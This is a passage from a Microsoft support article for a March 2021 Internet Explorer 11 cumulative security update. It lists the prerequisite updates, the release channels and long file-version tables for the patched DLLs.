To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures](<https://portal.msrc.microsoft.com/en-us/security-guidance>). Additionally, see the following articles for more information about cumulative updates:\n\n * [Windows Server 2008 SP2 update history](<https://support.microsoft.com/help/4343218>)\n * [Windows 7 SP1 and Windows Server 2008 R2 SP1 update history](<https://support.microsoft.com/help/4009469>)\n * [Windows Server 2012 update history](<https://support.microsoft.com/help/4009471>)\n * [Windows 8.1 and Windows Server 2012 R2 update history](<https://support.microsoft.com/help/4009470>)\n**Important**\n\n * The fixes that are included in this update are also included in the March 2021 Security Monthly Quality Rollup. Installing either this update or the Security Monthly Quality Rollup installs the same fixes.\n * This update is not applicable for installation on a device on which the Security Monthly Quality Rollup or the Preview of Monthly Quality Rollup from March 2021 (or a later month) is already installed. This is because those updates contain all the same fixes that are included in this update.\n * If you use update management processes other than Windows Update and you automatically approve all security update classifications for deployment, this update, the March 2021 Security Only Quality Update, and the March 2021 Security Monthly Quality Rollup are deployed. We recommend that you review your update deployment rules to make sure that the desired updates are deployed.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/library/hh825699>). 
\n--- \n \n## Known issues in this security update\n\nWe are currently not aware of any issues in this update.\n\n## How to get and install this update\n\n### Before installing this update\n\nTo install Windows 7 SP1, Windows Server 2008 R2 SP1, or Windows Server 2008 SP2 updates released on or after July 2019, you must have the following required updates installed. If you use Windows Update, these required updates will be offered automatically as needed.\n\n * Install the SHA-2 code signing support updates: \n \nFor Windows 7 SP1, Windows Server 2008 R2, and Windows Server 2008 SP2, you must have the SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) that is dated September 23, 2019 or a later SHA-2 update installed and then restart your device before you apply this update. For more information about SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>). \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)) that is dated March 12, 2019. After update [KB4490628](<https://support.microsoft.com/help/4490628>) is installed, we recommend that you install the December 8, 2020 SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>). \n \nFor Windows Server 2008 SP2, you must have installed the servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)) that is dated April 9, 2019. After update [KB4493730](<https://support.microsoft.com/help/4493730>) is installed, we recommend that you install the October 13, 2020 SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)) or a later SSU update. 
For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>).\n * Install the Extended Security Update (ESU): \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/en/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n \nFor Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, you must have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems and follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n * For Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>). \n \nFor Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services. 
\n \nFor Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n\n**Important** You must restart your device after you install these required updates.\n\n### Install this update\n\nTo install this update, use one of the following release channels.\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update for the following versions:\n\n * Internet Explorer 11 for Windows Server 2012 and Windows Embedded 8 Standard\nFor all other versions, see the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=5000800>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows: **Product**: Windows Server 2008 Service Pack 2, Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Server 2012, Windows Embedded 8 Standard, Windows 8.1, Windows Server 2012 R2; **Classification**: Security Update \n \n## File information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables.\n\n**Note** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n### **Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2**\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.19301| 25-Feb-2019| 22:20| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 
\npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 17:50| 1,343,488 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 
12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:30| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 18:12| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 
### Internet Explorer 11 on all supported x64-based versions
8-Feb-2021| 20:02| 1,678,023 \ninetcomm.dll| 6.3.9600.19963| 12-Feb-2021| 18:36| 1,033,216 \nINETRES.dll| 6.3.9600.16384| 22-Aug-2013| 4:43| 84,480 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 19:04| 5,499,904 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 19:03| 814,592 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 19:04| 785,408 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 19:15| 581,120 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 18:58| 20,296,192 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nwow64_Microsoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:43| 3,228 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 18:09| 13,881,856 \nie9props.propdesc| Not versioned| 23-Sep-2013| 19:34| 2,843 \nwow64_ieframe.ptxml| Not versioned| 5-Feb-2014| 21:43| 24,486 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 18:14| 4,112,384 
\njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:37| 653,824 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:47| 498,176 \nactxprxy.dll| 6.3.9600.19301| 25-Feb-2019| 22:20| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 17:50| 1,343,488 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 
\nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:30| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 18:12| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 
\nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 
\nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.19963| 12-Feb-2021| 17:53| 4,388,352 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 
\ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \niedkcs32.dll| 18.0.9600.19963| 12-Feb-2021| 
18:11| 333,312 \ninstall.ins| Not versioned| 12-Feb-2021| 16:25| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:48| 710,656 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 18:59| 772,608 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.19846| 23-Sep-2020| 20:01| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \npdm.dll| 12.0.41202.0| 